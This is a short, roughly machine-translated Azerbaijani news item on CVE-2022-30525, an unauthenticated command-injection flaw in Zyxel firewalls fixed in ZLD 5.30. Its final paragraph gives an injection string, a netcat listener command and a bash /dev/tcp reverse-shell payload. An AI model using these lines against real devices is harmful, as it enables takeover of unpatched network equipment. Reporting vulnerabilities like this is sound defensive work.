Zyxel firewalllarında identifikasiya olmadan kodun icrasına imkan verən boşluq

Müəssisələrdə firewall, IDS və VPN-nin işini təşkil etmək üçün nəzərdə tutulmuş ATP, VPN və USG FLEX seriyalı Zyxel cihazlarında kritik zəiflik (CVE-2022-30525) müəyyən edilib ki, bu da xarici təcavüzkarın proqramda kod icrasına imkan verir. autentifikasiya olmadan istifadəçi hüquqları olmayan cihaz. Hücum etmək üçün təcavüzkar HTTP/HTTPS protokolundan istifadə edərək cihaza sorğu göndərə bilməlidir. Zyxel ZLD 5.30 mikroproqram yeniləməsində zəifliyi aradan qaldırdı. Shodan xidmətinin məlumatına görə, hazırda qlobal şəbəkədə HTTP/HTTPS vasitəsilə sorğuları qəbul edən 16213 XNUMX potensial zəif cihaz var.

Əməliyyat autentifikasiya olmadan əldə edilə bilən veb işləyici /ztp/cgi-bin/handler-ə xüsusi hazırlanmış əmrlər göndərməklə həyata keçirilir. Problem lib_wan_settings.py kitabxanasında istifadə edilən və setWanPortSt əməliyyatının işlənməsi zamanı yerinə yetirilən os.system çağırışından istifadə edərək sistemdə əmrləri yerinə yetirərkən sorğu parametrlərinin düzgün təmizlənməsinin olmaması ilə əlaqədardır.

Məsələn, təcavüzkar sətirdən keçə bilər “; ping 192.168.1.210;" sistemdə “ping 192.168.1.210” əmrinin yerinə yetirilməsinə gətirib çıxaracaq. Komanda qabığına giriş əldə etmək üçün sisteminizdə “nc -lvnp 1270” işə sala və sonra '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

Mənbə: opennet.ru

Добавить комментарий